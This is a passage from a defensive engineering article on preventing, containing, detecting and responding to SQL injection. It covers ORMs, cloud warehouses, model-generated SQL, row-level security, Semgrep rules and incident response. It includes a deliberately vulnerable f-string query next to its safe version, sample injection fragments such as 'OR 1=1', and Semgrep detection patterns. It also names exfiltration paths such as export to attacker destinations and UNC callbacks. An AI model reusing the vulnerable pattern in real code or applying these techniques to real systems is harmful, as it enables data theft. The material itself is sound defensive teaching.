LIMITorOFFSET, reject absurd values, and reject anything outside the driver and database integer range, since both negatives and overflow can throw errors or behave surprisingly per engine. They are also an availability footgun even when bound, since a hugeOFFSETforces the engine to count and discard millions of rows: clamp the maximum limit and prefer keyset (seek) pagination so an attacker cannot demand expensive deep scans. Deep pagination usually drags two other costs along with the offset: a fullORDER BYsort of the result set and aCOUNT(*)for the total, both of which get expensive at scale, so cap or approximate the count and make sure the sort is index-backed rather than letting either run unbounded. One specific trap drives teams to give up and concatenate: with PHP PDO's emulated prepares on, a bound integer is sent quoted (LIMIT '10'), MySQL rejects it as a syntax error, and people conclude "you cannot bind a LIMIT" and splice it in raw. You can bind it: pass it withPDO::PARAM_INT, or turn emulation off, and the quoting goes away. - JSON path and full-text expressions. JSON path strings
(
jsonb_path_query,JSON_EXTRACT) and full-text builders (to_tsquery,MATCH ... AGAINST) have their own little grammars; a user-supplied path or query concatenated in is injection into that grammar, not the value slot. JSON paths carry an availability footgun even when they are not injected: recursive descent and broad array wildcards can fan out into a denial of service over large documents, so limit the path depth and reject open-ended wildcards on user-supplied paths. For PostgreSQL search text, preferplainto_tsqueryorwebsearch_to_tsquery, which are intended for plain user input, overto_tsquery, which expects and trusts query syntax. They are the safer choice, not a free pass: still cap length, set a timeout, and design the search sanely so a valid-but-expensive query cannot become a denial of service. Decide deliberately which mode you are offering: plain user search (thewebsearch/plain functions) for normal users, and, only if you actually intend to expose advanced operators, treat that as a separate mini-language with its own allowlist of permitted operators and its own limits, rather than letting raw query syntax through under the banner of "search." The commonest form is interpolating the key itself into a->>or->accessor, which feels safe because it sits inside a JSON operator; the key is a value, so bind it:# vulnerable: the JSON key is concatenated into the query text cur.execute(f"SELECT * FROM events WHERE payload->>'{user_key}' = 'fail'") # safe: the key is a value (or use jsonb_extract_path_text(payload, %s)) cur.execute("SELECT * FROM events WHERE payload->>%s = 'fail'", (user_key,)) - Type coercion that defeats an index. A value's type is an
availability and correctness footgun even when it is safely bound. Compare an indexed
VARCHARcolumn against a number,WHERE phone = 123456789, and MySQL converts the whole column to a number to do the comparison, which abandons the index and forces a full-table scan: an application-level denial of service from a single well-typed request. The same implicit conversion is a logic trap too, since in MySQL'anything' = 0is true, so a numeric comparison against a string column can match rows it never should. Match the bound value's type to the column, and reject input that does not fit the column's type before it reaches the query. - Regex and SIMILAR TO. User-controlled patterns can inject regex operators,
trigger catastrophic backtracking (a denial of service), or smuggle SQL-pattern syntax
through
SIMILAR TO. The practical defense is mostly avoidance: do not expose arbitrary regex where a substring or full-text search would do. Where you genuinely need it, cap pattern length, compile with a timeout where the engine supports one, reject nested quantifiers (the(a+)+shape that drives backtracking), and prefer an engine with predictable, linear-time matching (RE2-style) over a backtracking one. - Dynamic filter DSLs and report builders. The "build a query from the user's
filters" feature is the richest footgun of all: field names, operators, sort, and grouping
are all structure, all attacker-chosen, and none can be a bound value. Every one of those
choices needs an allowlist mapping input to fixed, known-safe tokens, and operators should
be allowlisted per field type, not globally, a date field gets ranges, a string field gets
equality and prefix, never the reverse. And "structure" here is more than fields and
operators: boolean grouping and nesting, joins, aggregates,
GROUP BYandHAVING, and null semantics are all attacker-chosen structure too, each needing its own allowlist, plus a cap on overall depth and complexity so a filter tree cannot nest its way into an unbounded or ruinously expensive query. Make those allowlists authorization-aware, not merely syntactically safe: a field, join, aggregate, or relationship can be perfectly valid SQL and still expose data the current role or workflow should never see, so the allowlist has to encode who may query what, not just what parses.
The tell is the same every time: if the user controls a name, an operator, or a pattern's grammar rather than a plain value, binding does not save you. To be precise, the bind still does its job, it stops injection into the SQL parser; what it cannot stop is injection into a secondary grammar riding inside the value, a regex, a JSON path, full-text query syntax, or a filter DSL. That grammar needs its own defense. Constrain it to a set you defined.
Beyond the request: bulk imports, ETL, and cloud warehouses
Most of the channels above are request-driven, but a large share of an application's SQL is built far from any web handler, in code that reads files, moves data in bulk, and runs analytics. Those paths are the ones nobody fuzzes, and they tend to run with broad privileges, which is exactly why they are worth naming on their own.
Bulk, ETL, and import paths
Generated COPY and LOAD DATA statements, CSV-to-SQL loaders,
warehouse ingestion jobs, admin import mappers, and background enrichment all tend
to build SQL from data they do not control: file contents, column headers, sheet names, or a
field mapping the user uploaded. It is second-order injection by construction, the bytes were
written earlier, sometimes by a different system, and the unsafe statement is built when they
are read back, often by a privileged batch role with file access. The fixes are the ones from
Level 1 with a bulk-specific edge: move the row data through the driver's native bulk path
rather than building statements out of it, a static COPY FROM STDIN command with
the rows streamed and driver-encoded over the copy protocol (not SQL bind parameters), a
prepared multi-row insert with bound values, or a real bulk-load API, never a string-built
INSERT; treat headers and user-supplied column mappings as untrusted
structure that must resolve through an allowlist of real columns, never reflect a
spreadsheet header straight into an identifier; and run each import and reporting job under its
own least-privileged role rather than the broad account the app already uses.
Cloud warehouses and analytics engines
The cloud data warehouse is the other modern surface, and it changes what injection buys.
Snowflake, BigQuery, Redshift, Databricks SQL, and the BI query builders
layered on top rarely hand an attacker an OS shell, but injection there converts into a
different blast radius: cross-database and cross-dataset reads; external-stage and
object-storage abuse (COPY INTO, UNLOAD, or
EXPORT DATA to an attacker-controlled or attacker-readable destination the
warehouse role or storage integration is permitted to write); misuse of the cloud
identity the warehouse runs as (the attached IAM role, service account, or storage
integration, which usually reaches far more than the current query); stored-procedure
and UDF abuse (JavaScript and Python UDFs, external functions, and
EXECUTE IMMEDIATE dynamic SQL); and bulk export of entire tables. BI tools deserve
special caution: a report builder that assembles SQL from user-chosen dimensions, filters, and
sorts is a dynamic filter DSL at warehouse scale, and the allowlist-the-structure rule applies
unchanged. Defend it like any other database plus the cloud-native layers: bind values (major
warehouse APIs and drivers support bind variables or parameter markers for values, with driver
and statement-context exceptions), allowlist identifiers and dataset, schema, and stage names,
scope the warehouse role and its attached cloud identity to least privilege, restrict external
stages and network egress, lock down UDF and external-function creation, and enforce row-access
policies and column masking so a query that does get through still cannot cross the datasets or
columns it was never meant to see. One rule deserves to be explicit: never accept a
user-supplied bucket, stage, URI, or export destination. Map a requested destination to a
workflow-scoped, preapproved external location or storage integration, so an injected
COPY INTO or EXPORT DATA has nowhere to send the data even if it runs.
Generated SQL: when a model writes the query
The hardest case of all is when a model writes the query. The whole statement is structure you did not author, so the footgun is not one feature but the entire SQL surface. The strongest move is to not let the model emit arbitrary SQL at all: have it produce constrained JSON or an intent object that a deterministic query builder compiles into SQL, because validating a narrow internal DSL you defined is far easier than validating arbitrary SQL after the fact.
Where you must accept generated SQL, make the dangerous things impossible rather than discouraged. A read-only role is the floor, not the ceiling: pair it with a read-only transaction and read-only session settings, and revoke temp-object privileges where the engine supports it, so the sandbox cannot write, run DDL, or create temporary objects, which are a sneaky write and side-effect surface even when permanent DDL is already denied.
Then gate the statement, and make that gate dialect-specific and recursive: parse with the target
engine's grammar, require exactly one statement, and inspect every subtree. A shallow "is it a
SELECT?" check sails right past dangerous function calls, CTEs, subqueries, lateral joins,
hidden table references, comments, stacked statements, and vendor-specific syntax. Reject
anything the DSL does not explicitly need. The AST check is the primary gate; query-plan
inspection of touched tables, functions, and row estimates is a supplemental, engine-specific
add-on. Order matters: run the AST and function allowlist before the SQL ever reaches
the planner. Planning is not free of consequences, it resolves and discloses object and schema
metadata, and on some engines or configurations it can invoke planner-time functions, rewrite
rules, or hooks, so handing un-vetted model SQL even to a non-executing plan is not
automatically safe. When you do inspect a plan, use a non-executing one, plain
EXPLAIN under the sandbox role, never EXPLAIN ANALYZE or anything that
actually runs the query.
Allowlist deliberately and deny by default, not just "no writes": permit only specific tables,
columns, joins, operators, and callable functions, since a read-only role can still
invoke expensive, leaky, or side-effecting functions depending on the engine and config. Block
the control surface too, not only data changes: FOR UPDATE and
LOCK TABLE, advisory locks, SET, transaction-control commands, and
optimizer hints have no business in a generated read query, so reject them rather than assuming
"read-only" already covers them.
Enforce row and tenant policy in the database underneath all of it, and cap output. Remember the slower exfiltration path: even with per-query output capped, an agent can page through and summarize sensitive rows across many turns, so the policy also has to bound the conversation or session budget, repeated paging over the same data, and what the model is permitted to reveal, not just the size of one result.
Mind what your rejections say, as well. A detailed "unknown column x in table y" or "policy z
blocked this" hands the model, or whoever is steering it, a free map of your schema and rules.
Log the rich reason internally and return a bland error outward. And keep human approval in its
place: it is for exceptional, policy-permitted workflows, not the control that stands between a
generated DROP and your data; the app role should make that statement unrunnable in
the first place.
The escape hatches, by framework
Every ORM and query builder binds values for you on its normal path, and every one ships a raw escape hatch that does not. The rule is the same across all of them: stay on the typed API, and when you genuinely need raw SQL, bind through it rather than interpolating. The middle column is what to grep for in review; the last column is the correct way to use raw SQL when you must.
| Framework | Safe API (binds for you) | Dangerous escape hatch | Correct raw-SQL bind |
|---|---|---|---|
| Django | filter(col=v) |
.raw(), .extra(), RawSQL |
.raw("...WHERE id=%s", [v]) |
| SQLAlchemy | where(Col==v) |
text("..."+v) |
text("...=:v").bindparams(v=v) |
| Rails / ActiveRecord | where(col: v) |
where("...#{v}"), Arel.sql,
find_by_sql |
where("col = ?", v) |
| Laravel / Eloquent | where('col', $v) |
whereRaw("...$v"), DB::raw |
whereRaw('col = ?', [$v]) |
| Prisma | where: { col: v } |
$queryRawUnsafe, $executeRawUnsafe,
Prisma.raw |
tagged $queryRaw / $executeRaw,
Prisma.sql |
| Knex | where({ col: v }) |
whereRaw("..."+v), knex.raw(str) |
whereRaw('col = ?', [v]) |
| TypeORM | find({ where: { col: v } }) |
.query(str), where("..."+v) |
where("col = :v", { v }) |
| Sequelize | findAll({ where: { col: v } }) |
query("..."+v), literal() |
query("...=$1", { bind: [v] }); replacements only
escapes (not bound) |
| Hibernate / JPA | Criteria API, cb.equal(...) |
string-built HQL / JPQL | setParameter("v", v) on a named param |
| MyBatis | #{v} (bound parameter) |
${v} (string substitution) |
#{v} for values; allowlist any ${} structure |
| Dapper | Query(sql, new { v }) |
interpolation into sql |
Query("...=@v", new { v }) |
| JDBC | PreparedStatement with ? |
Statement + concatenation |
ps.setString(1, v) |
| EF Core | Where(x => x.Col == v) |
FromSqlRaw(str), ExecuteSqlRaw(str) |
FromSql($"...{v}") (EF Core 7+),
FromSqlInterpolated / ExecuteSqlInterpolated
(earlier, and for commands) |
Note: read the Dapper row carefully. Unlike the ORMs above it, Dapper does not build SQL for you, so it is not "safe by default," it is safe only when the SQL text is static and every value is passed as a parameter. Interpolate user input into the command string and it runs exactly what you wrote. The same holds for JDBC and any raw layer: the safety is in a constant SQL string plus bound values, not in the library itself.
Containment architecture: assume one gets through
Parameterization is the control; containment decides what a missed one costs. "Least privilege"
is the headline, but in practice it is an architecture, not a single GRANT.
- A role per app, service, and workflow. One shared, broadly privileged login means any injection anywhere reaches everything. Separate roles scope each blast radius to the job that owns it, and let a reporting or import path run with its own limited rights.
- Separate ownership from runtime. The role the app connects with should not
own its tables. Run migrations as a distinct owner or deployer role, and revoke
CREATEon schemas the app has no reason to extend. After least privilege itself, separating the owner from the runtime role is one of the biggest practical containment wins. - Harden
SECURITY DEFINERfunctions. They execute with the definer's rights, so a vulnerable one is an escalation path, especially when it references objects by unqualified name: if an attacker can create a shadow object in an earlier schema on thesearch_path, the function resolves to theirs and runs it as the definer. Schema-qualify the objects inside such functions, revoke schemaCREATEso shadow objects cannot be planted, and explicitly setsearch_pathto the trusted schemas withpg_templast. Do not rely on omission: temp schemas can still be searched ahead of normal ones for relation and type names, so leavingpg_tempout is not the same as making it safe. Qualified names plus an explicit path are what actually close the shadowing window. And treat dynamic SQL inside a definer function as doubly dangerous, since it runs with elevated rights: bind every value (EXECUTE ... USING), allowlist any identifier, never build an object name from a caller-supplied string, and use safe identifier formatting (format('%I', ...),quote_ident) where a name truly must vary. - Read-only by default. Most endpoints only read. Give them a role that
cannot write, and an injection on a read path cannot tamper or drop. Read-only is not inert,
though: a role that can still execute side-effecting functions, unsafe definer functions, or
extension functions has more reach than its name implies, so revoke
EXECUTEon the functions and packages the app does not actually call, and set default privileges so newly created functions are not executable by the app role by accident, otherwise the next migration quietly re-opens the gap. Revoking from the app role is only half of it: audit what the role inherits, especially PostgreSQL's habit of grantingEXECUTEtoPUBLICon new functions, which the app role gets for free unless you revoke it fromPUBLICand adjust default privileges. Mind overloads and schemas while you are at it: revoking one function name does not cover its other overloaded signatures, and an unsafe function sitting in a trusted, on-path schema is as dangerous as a direct table grant. As a default, write functionsSECURITY INVOKER(run as the caller) and reserveSECURITY DEFINERfor the few that genuinely need elevated rights. - Views that hide sensitive columns. OWASP calls these out specifically:
expose each workflow or app role only to a view that omits password hashes, tokens, and PII,
and even a successful
SELECT *through injection cannot reach the columns you withheld. Scope it per role, the auth path that genuinely needs the hash can reach it through its own narrower role or a dedicated function, while the rest never can. A view only contains anything if the app role cannot also reach the base tables directly, so revoke the role's direct grants on the underlying tables and expose only the view or API surface intended for it, otherwise an injection just queries around the view. It reduces the blast radius rather than eliminating it, the projected rows may still hold regulated or business-sensitive data, so treat views as one containment layer, not a guarantee that a leak is harmless. In high-sensitivity PostgreSQL designs, mark such viewssecurity_barrierso a leaky or cleverly chosen user function cannot have its predicate pushed past the view's own filtering. Watch view ownership when combining views with RLS, too: a view runs with its owner's privileges by default, so it is the view owner's privileges that determine whether RLS on the underlying tables is applied or bypassed, not the calling role's; usesecurity_invokerviews (on supported PostgreSQL versions, 15 and later) for the cases where you intend the querying role's policies to be enforced. - Encrypt or tokenize the highest-value fields, with keys the database cannot reach. For the data a leak would hurt most, secrets, tokens, payment and identity fields, store ciphertext or a surrogate token and keep the keys in a KMS or a separate service, so a successful read returns opaque bytes rather than plaintext, and decrypt only through narrow, audited application workflows that genuinely need it. The caveat is what does not count: transparent database encryption (TDE) protects files at rest, not query results, and any scheme whose keys are reachable by the injected database role, decryption done in the database, a key sitting in a table, a UDF that unwraps it, leaves the blast radius unchanged, because the attacker's query can decrypt exactly as the application does. The protection only holds when the key lives somewhere the injected query cannot follow.
- Tenant isolation with row-level security. In multi-tenant systems, enforce
the tenant boundary in the database, not just the query. PostgreSQL's row-level security attaches a policy to every row, so an
injected
OR 1=1still cannot cross tenants: the engine filters by policy regardless of theWHEREclause the attacker wrote. It only holds when it is set up correctly, though, enable it on every protected table, keep the runtime role a non-owner that is not a superuser and lacksBYPASSRLS, and useFORCE ROW LEVEL SECURITYwhere the owner or deployer role may query through the same path (policies otherwise do not apply to a table's owner; it is not always required when the app role is already a non-owner). Get the setup wrong and it is decorative; get it right and it holds even when the query does not. - Cover writes, not just reads. A
USINGclause filters which rows a query can see, but it takes aWITH CHECKclause to stop an injectedINSERTorUPDATEfrom creating a row in, or moving one into, another tenant. Without it the read side is contained while the write side leaks, which matters precisely because injection threatens integrity, not just confidentiality. - Mind permissive versus restrictive policies. Multiple permissive policies are combined with OR, so each one only ever widens access: a single accidental broad permissive policy can quietly undercut the whole tenant boundary. Use restrictive policies (combined with AND) for the invariants that must always hold, but remember they only narrow access, they never grant it: at least one permissive policy still has to allow the row, so a table with only restrictive policies returns nothing. Review the full set of policies on a table together, not one at a time.
- RLS does not cover helper functions. Policies do not protect you from
functions that intentionally expose protected rows or run with elevated rights, so audit any
SECURITY DEFINERfunction that touches tenant-scoped tables, it can hand back exactly the rows the policy was meant to hide. - Tenant context and connection pools. RLS is only as trustworthy as the
tenant context it reads. A policy keyed on a session variable like
current_setting('app.tenant_id')can be subverted if an injection stacks aSET, or if a pooled connection silently reuses the previous request's value. The strongest forms are per-tenant database roles where practical (they can be operationally heavy past a few thousand tenants), or, more commonly at scale,SET LOCALinside a transaction with multi-statements disabled and the connection-pool reset verified so context never leaks between requests. Whichever you choose, the policy must fail closed: ifapp.tenant_idis missing, malformed, or unset after a pool reset, it should return no rows or raise, never fall back to a default tenant or broad access. That silent fallback is the quiet failure mode in app-set session-variable RLS, and it converts a missing variable into a cross-tenant leak. Mind the pooler mode, too: transaction-pooling setups (PgBouncer and the like) can break assumptions about session variables, prepared statements, and reset behavior.SET LOCALinside an explicit transaction is the right direction, but it only holds if the pooler preserves that transaction boundary rather than multiplexing the statements across backends.
The mechanics above are PostgreSQL's, because it exposes the most of this surface in the open, but every major platform has direct equivalents. Map them across before assuming a control is Postgres-only:
| Platform | Row filtering | Column hide / mask | Delegated / elevated access to audit |
|---|---|---|---|
| PostgreSQL | RLS policies (USING / WITH CHECK), FORCE RLS | column GRANTs, security_invoker / security_barrier views | SECURITY DEFINER functions |
| SQL Server | Row-Level Security (security policies + predicates) | Dynamic Data Masking, column GRANT, views | EXECUTE AS, ownership chaining |
| Oracle | VPD (DBMS_RLS policies) | Data Redaction, views | definer-rights (AUTHID DEFINER) packages |
| Snowflake | row access policies | masking policies, secure views | owner's-rights procedures; external functions / external access integrations |
| BigQuery | row access policies | policy tags (column-level), authorized views | authorized views and routines |
| Databricks (Unity Catalog) | row filters | column masks | dynamic views; external-location governance |
One caveat on the masking column: masking is not encryption and not a substitute for revoking access to the base objects. Depending on the platform and the grants, a role with broad or ad hoc query privileges can often infer or bypass masked values, so treat masking as a presentation-layer control on top of real access revocation, not as the boundary itself.
Each layer holds even when the code does not. Containment starts from the assumption that a query will be built wrong some day, and arranges things so that day is survivable.
Proving you actually did it
Writing the defense is one thing; proving on demand that it is real, and stays real, is another. A verification program for injection has a few moving parts:
- Code review with a pattern in mind. Treat string-built SQL as guilty until
proven innocent, and require that every dynamic-SQL exception names the allowlist that
justifies it. "Why is this concatenated?" should have a written answer in the diff. The
structural fix is to centralize query construction: route raw and dynamic SQL through a
small set of helpers where binding, allowlists, logging, and tests are enforced once, so
review has a handful of files to watch instead of every call site. Make it stick with the
inverse rule: a lint or CI policy that forbids ad hoc raw SQL anywhere outside those
helpers, otherwise centralization is aspirational and drifts back to scattered call sites.
That policy should be a rule, not a wiki page. The Semgrep starting point below fails any
f-string or concatenated SQL built outside the reviewed helpers; the convention it assumes
is that all such code lives under a
db/package, so point theexcludepath at wherever yours actually lives:# Semgrep (starting point): ban ad hoc raw SQL outside the reviewed db/ helpers rules: - id: raw-sql-only-in-db-helpers languages: [python] severity: ERROR message: > Dynamic SQL built by f-string/concat must live in the reviewed db/ helpers, where binding and allowlists are enforced once. paths: exclude: ["**/db/**", "**/tests/**"] patterns: - pattern-either: - pattern: $CUR.execute(f"...", ...) - pattern: $CUR.execute("..." + $X, ...) - pattern: $CUR.execute("...".format(...), ...) - Review migrations like code. The containment above lives in schema and
grants, so changes to it deserve the same scrutiny as application code. Treat
GRANTandREVOKE,CREATE EXTENSION,SECURITY DEFINER, RLS policy edits, and changes to ownership, schema, or default privileges as security-relevant diffs that a reviewer signs off on, since one loose grant or a dropped policy in a migration silently dismantles a control you carefully built. - Static analysis in CI. Semgrep, CodeQL, and commercial SAST trace taint
from a request into a query sink. Fail the build on the signal you trust, high-confidence
taint rules and any new or changed dangerous sink in the diff, and route the noisier
findings to triage rather than blocking on them. A gate calibrated this way gets respected;
one that fails on every false positive gets disabled. A taint rule you trust looks like
this, request data reaching the SQL text of
execute(), with numeric coercion and an allowlist lookup treated as sanitizers so they do not trip it (tune the sources and sanitizers to your framework, and run it alongside Semgrep's maintained registry rules, not instead of them):
That# Semgrep (starting point): request data reaching the SQL text of execute() rules: - id: tainted-data-into-sql-string languages: [python] severity: ERROR mode: taint message: > User input flows into the SQL text of execute(). Pass it as a bound parameter (placeholder + value), not by concatenation or f-string. pattern-sources: - pattern: flask.request.args.get(...) - pattern: flask.request.form.get(...) pattern-sanitizers: - pattern: int(...) # numeric coercion - pattern: $ALLOW.get(...) # allowlist lookup returns a trusted token pattern-sinks: - patterns: - pattern: $CUR.execute($SQL, ...) - focus-metavariable: $SQL # the query text only, bound params are safe$ALLOW.get(...)sanitizer is only safe when the map is static and trusted and a miss is rejected before the query is built; a lookup that can return attacker-influenced text, or that falls through to the raw value on a miss, would silently suppress real findings. Both snippets are Python, since Semgrep rules are per-language, but the same source-to-sink shape ports to the equivalent escape hatches in JS, Java, PHP, and Ruby. - Grep as a cheap backstop. Even a CI grep catches most of the danger: search
for
raw,literal,whereRaw,.extra(,EXEC(, and f-strings or+concatenation next toSELECT/INSERT/UPDATE. Each hit is a place to confirm a bind or a named allowlist. Add the framework escape hatches to the list:$queryRawUnsafe(Prisma),text()andliteral_column(SQLAlchemy),.query((TypeORM),${...}(MyBatis),DB::raw(Laravel),find_by_sqlandArel.sql(ActiveRecord), and interpolated SQL in Dapper. Grepsp_executesqltoo, but treat it as a review target rather than a finding: it is the safe SQL Server pattern as long as the statement is static and the values are passed as parameters instead of concatenated into the string. Treat the whole list that way, in fact, every hit is a place to look, not a confirmed bug. Several entries (text(),DB::raw,Arel.sql) are perfectly safe when fed bound parameters and trusted, static fragments; the grep finds the conversations to have, and the review decides which are real. Extend the same grep to the bulk and warehouse paths, which app-layer patterns miss:COPY,COPY INTO,LOAD DATA,BULK INSERT,UNLOAD,EXPORT DATA,EXECUTE IMMEDIATE,copy_expert, and references to a stage or external location, then confirm each builds its statement and its object names from constants and allowlists, not from file contents or request input. - Unit and property tests for the allowlist layer. The structural defenses, query builders, sort handlers, and filter DSLs, are code you can test directly. Feed them malicious field names, unexpected operators, and bogus sort directions, and assert that each is rejected or mapped to a known-safe token. That proves the allowlist itself, the part SAST and DAST struggle to reason about, and pins the behavior so a later refactor cannot quietly loosen it.
- Dynamic testing and fuzzing. DAST, parameter fuzzing, and a controlled
sqlmaprun against staging prove the running app, not just the source, and catch the second-order and config-dependent cases SAST cannot see. Keep it responsible: only against systems you own, on staging rather than production, rate-limited, with destructive tests off unless they are explicitly planned. It only finds what it can reach: SQL injection often hides behind authentication, CSRF and session flows, multi-step forms, imports, and background jobs, so the run has to be authenticated and stateful, exercising those paths with seeded data rather than just hammering the public surface. For the second-order cases specifically, plant the bait: seed canary payloads through imports, profile fields, and webhooks, then exercise the features that later reuse that stored data, reports, background jobs, notifications, exports, and admin views, and watch for the payload firing downstream. That is how you catch the read that was built unsafely long after the write that looked fine. Use out-of-band canaries as well as payload canaries: point a staging DNS or HTTP callback domain at your own collector and watch for blind hits, which safely surfaces the blind OOB paths, SSRF-style DB integrations, and UNC/SMB callbacks that return nothing in the response itself. Test the tenant boundary explicitly while you are in there: seed two tenants with canary rows and assert that no payload, from one tenant's session, can read or write the other's data. Cross-tenant leakage is exactly the failure RLS and tenant context are meant to prevent, and it is the one a generic scanner will not think to check. - Fingerprint the generated SQL in staging. Log the queries your features actually emit, then assert their shape: when a test exercises a path, check that the SQL matches the expected template and uses bind markers rather than inlined literals. This is how you catch the "safe-looking UI path that quietly built raw SQL" bug before production, where neither a grep nor a type signature would have flagged it. Log the normalized template or fingerprint, not the full SQL with bound values, otherwise the diagnostic itself becomes a sensitive-data sink; assert on the bind markers and the query shape, and keep retention and access to those logs tight. Watch specifically for literal inflation: a useful assertion is that the shape uses bind markers and does not inline high-cardinality request values into the SQL text, because a query can match the expected structure while still smuggling raw literals where parameters belong.
- Lock and test driver configuration. The defenses you rely on are often defaults, and defaults drift on upgrade: a driver or ORM bump can quietly flip emulated prepares, multi-statement support, escaping behavior, a raw-query API, or type binding. Pin those settings explicitly and add a test that asserts the dangerous ones are off so a routine upgrade cannot silently reopen a hole. Do not just read the config back, prove the behavior with integration tests against a real database: assert that a stacked statement is actually rejected, that emulation is off where you expect, and that a bound parameter is sent as a bind rather than inlined into the SQL text. That last one is hard to see from ordinary DB logs, since many systems render binds back inline for readability, so confirming it usually means driver or wire-protocol instrumentation, prepared-statement metadata, or a controlled test payload that would error if it were ever parsed as code. Config flags and runtime behavior drift apart, and it is the behavior that matters. Pin dependency versions too, but pair the pin with an intentional upgrade process and config regression tests, never-upgrading is its own security problem; the goal is upgrades that are deliberate and verified, not frozen.
Keep the line between the two environments clear: active exploitation tooling
(sqlmap, fuzzers, injected payloads) belongs on staging. In production,
verification is passive, telemetry, canaries, and rate and query-shape signals that flag an
attack without becoming one. Do not point active scanners at production traffic or data.
Make one rule non-negotiable and most of this enforces itself: every piece of dynamic SQL must reference a named allowlist. If a query varies its structure and there is no allowlist next to it, that is the finding, before anyone even tries to exploit it.
When it happens anyway
MOVEit is the reminder that one missed query can mean full compromise, so the response plan matters as much as prevention. If you suspect SQL injection has been exploited, the checklist runs roughly:
- Preserve evidence first, where you safely can. Rotation and reboots wipe exactly the state an investigation needs. Before you start tearing things down, snapshot the web roots, application and database audit/query logs, the WAF, reverse-proxy, and CDN logs (often the only place the original HTTP parameter, encoding, body, cookie, or duplicated parameter survives, which you need to reconstruct the exploit), running process lists, active and unusual database sessions, filesystem timestamps, and cloud and network flow logs. Where it is safe to, take a database snapshot too, a volume or managed snapshot before any destructive cleanup, so investigators have a frozen copy to reconstruct what the attacker's queries did. A few minutes of capture is the difference between knowing what was taken and guessing. It only correlates if the clocks agree: without synchronized time across the WAF, app, database, proxy, and cloud logs, stitching the timeline back together gets mushy fast, so confirm time sync is in place before an incident, not during one.
- Isolate egress, then cut access. Block the database host's outbound network to stop exfiltration in progress, then rotate database and application credentials and kill active sessions; assume the connection string and any cached secrets are burned.
- Account for what the data itself unlocks. If the query could have reached password hashes, session tables, password-reset tokens, API keys, or OAuth refresh tokens, the breach is also a credential breach: invalidate sessions, force resets, and rotate the exposed keys and tokens as part of containment, not after. Stolen secrets are how a one-time read becomes ongoing access.
- Hunt for persistence. Inspect web roots for dropped shells, and review triggers, scheduled jobs, stored procedures, and any new or newly elevated database and admin users, the places a query-to-shell pivot leaves itself a way back. Check the "database to elsewhere" footholds too: database links, foreign servers, and linked servers; external data sources; saved credentials and proxy accounts; replication and CDC jobs; and any cloud integration credentials the instance holds.
- Check for integrity damage, not just theft. Injection writes as well as
reads: look for unexpected
UPDATEorDELETEactivity, new admin accounts, changed roles or grants, modified stored procedures and triggers, and altered scheduled jobs. Tampering is easy to miss when everyone is focused on what leaked. - Look for exfiltration. Check for unexpected outbound DNS and HTTP from the
database host (the out-of-band channel), and read the query and audit logs for
information_schemasweeps,UNIONactivity, and bulk reads. Do not forget the SMB path from the out-of-band discussion above: watch for outbound 445 / 139 and UNC callbacks, plus NTLM authentication events to unfamiliar hosts and any relay or hash-capture indicators, that is credential theft, not just data egress. Scope it beyond the primary, too: the same data often lives on read replicas and followers, in warehouses and data lakes, in ETL pipelines, object-storage exports, and BI and reporting layers, any of which the attacker may have reached or which simply widen what "exposed" means. - Pull the database's own recovery evidence. Binlogs (MySQL), the WAL (PostgreSQL), and transaction logs answer "what actually changed and when" with more fidelity than application logs, and your point-in-time-restore window and backups are how you get back to a known-good state. Note their limit: these logs capture writes, not reads, so they tell you what was altered, not what was exfiltrated, that question is the audit and query logging from the exfiltration step, not the transaction log. Confirm both exist and reach back far enough before you need them, and rehearse it: a backup that has never been restored is hope, not recovery, so run restore drills so the path is known to work under pressure. Mind what a restore brings back, too: point-in-time recovery will faithfully reinstate the attacker's created users, jobs, and triggers if you restore to after they landed, so a restore has to be paired with persistence cleanup and secret rotation, or you recover the foothold along with the data. And confirm the injection path is actually patched before you reconnect normal egress and credentials, otherwise a freshly restored, clean system is re-exploited within minutes by the same queued scanner or actor that hit it the first time. Clean up downstream as well: tampered rows may already have propagated to caches, queues, search indexes, materialized views, reports, and warehouses, so restoring the database alone can leave the bad data living happily one hop away.
- Scope the exposure. Identify the vulnerable parameter and every path that shares it, and, if the flaw was in a third-party product, check vendor advisories and patch status, the MOVEit pattern, where the bug was in someone else's code running in your environment.
- Get ready for notification duties. With SQL injection the exposed data is often exactly what triggers contractual, privacy, or regulatory notification obligations. Preserve the evidence above for counsel and incident response, and use it to scope who and what must be notified; that determination is far easier when the logs and change history are intact. Scope integrity impact, not only data exposure: altered balances, changed roles or permissions, modified email addresses, or tampered audit records can trigger contractual or regulatory obligations even when you cannot prove a single row was exfiltrated.
None of this is possible after the fact unless the logging and egress controls were already in place. That is the real reason to build containment before you need it, not during the incident.
The whole thing on one card
If you keep one artifact from this piece, keep this. Each line is a section above, compressed to the thing you actually do. It is also on the downloadable fix-and-prevent cheat sheet if you would rather print it:
Build it right
- Bind values. Parameterize every value, everywhere, including inside dynamic SQL and stored procedures.
- Allowlist structure. Identifiers, sort, operators, and grammars map to a fixed set you defined; never trust raw input for them.
- Disable emulation and multi-statements where you can, so escaping traps and stacked queries are off the table.
- Constrain generated SQL. Prefer a model-emitted intent/DSL compiled by a deterministic builder; if raw SQL is unavoidable, AST-allowlist it inside a read-only sandbox and cap the session and output budget.
- Test the raw-query escape hatches and pin driver config so an upgrade cannot reopen a hole.
Lock down privileges
- Least privilege on the app role: no DDL, no file, no OS, scoped to its schema.
- Lock down function execution. Revoke
EXECUTEandPUBLIC/default grants; an unsafe function is as good as a table grant. - Separate runtime from owner, and watch
SECURITY DEFINERandsearch_path.
Contain the blast radius
- RLS and views for containment, set up correctly, so a missed query still cannot cross tenants or read what you withheld.
- Expose views and APIs, not base tables. Revoke the app role's direct base-table grants so injection cannot query around the view.
- Fail closed on tenant context. Missing or unset
app.tenant_idreturns no rows or errors, never a default tenant. - Tokenize or encrypt the highest-value fields with keys the database role cannot reach, so a successful read returns opaque bytes, not plaintext.
- Control egress from the database host to kill the out-of-band exfiltration class.
- Add timeouts and caps to blunt blind extraction and bulk pulls.
Detect and respond
- Monitor catalog, time, and file probes, at the database and the app, not just the WAF.
- Preserve evidence first on an incident, before rotation wipes the answer to "what changed?"
- Treat exposed secrets as burned. Invalidate sessions, force password resets, rotate tokens and keys; out-of-band and UNC paths can leak credentials, not just data.
Why a 1998 bug still runs 2026's breaches
